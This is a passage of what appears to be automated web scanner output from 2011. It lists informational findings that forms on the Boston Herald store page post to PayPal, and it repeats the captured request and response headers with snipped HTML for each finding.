Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://bh.heraldinteractive.com/store/images/CelticsFrontpagejune20.gif" width="104" height="171">
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">

<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="PayPal - The safer, easier way to pay online!">
...[SNIP]...

6.4. http://www.bostonherald.com/store/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://bh.heraldinteractive.com/store/images/CelticsFrontpagejune6.gif">
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">

<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="PayPal - The safer, easier way to pay online!">
...[SNIP]...

6.5. http://www.bostonherald.com/store/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://cache.heraldinteractive.com/store/images/Jul070809.gif" width="104" height="111">
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
...[SNIP]...

6.6. http://www.bostonherald.com/store/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://bh.heraldinteractive.com/images/siteImages/universal/soxBackCopies3.gif">

<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="Make payments with PayPal - it's fast, free and secure!">
...[SNIP]...

6.7. http://www.bostonherald.com/store/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://cache.heraldinteractive.com/store/images/Jan202009.gif" width="104" height="106">
<form action="https://www.paypal.com/cgi-bin/webscr" method="post" target="_blank">
<input name="cmd" value="_s-xclick" type="hidden">
...[SNIP]...

6.8. http://www.bostonherald.com/store/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img height="167" src="images/Oct312007.jpg" align"right">

<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">

<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="Make payments with PayPal - it's fast, free and secure!">
...[SNIP]...

6.9. http://www.bostonherald.com/store/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://bh.heraldinteractive.com/store/images/CelticsFrontpagejune13.gif">
   
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">

<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="PayPal - The safer, easier way to pay online!">
...[SNIP]...

6.10. http://www.bostonherald.com/store/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img height="167" src="images/Oct302007.jpg" align"right">

<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">

<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="Make payments with PayPal - it's fast, free and secure!">
...[SNIP]...

6.11. http://www.bostonherald.com/store/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://bh.heraldinteractive.com/store/images/CelticsFrontpagejune18c.gif">
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">

<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="PayPal - The safer, easier way to pay online!">
...[SNIP]...

6.12. http://www.bostonherald.com/store/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://bh.heraldinteractive.com/store/images/CelticsSS.gif">
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">

<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="PayPal - The safer, easier way to pay online!">
...[SNIP]...

6.13. http://www.bostonherald.com/store/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://cache.heraldinteractive.com/store/images/20100120.jpg" width="104" height="111">
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
...[SNIP]...

6.14. http://www.bostonherald.com/store/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://bh.heraldinteractive.com/store/images/CelticsFrontpagejune19.gif">


<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">

<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="PayPal - The safer, easier way to pay online!">
...[SNIP]...

6.15. http://www.bostonherald.com/store/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
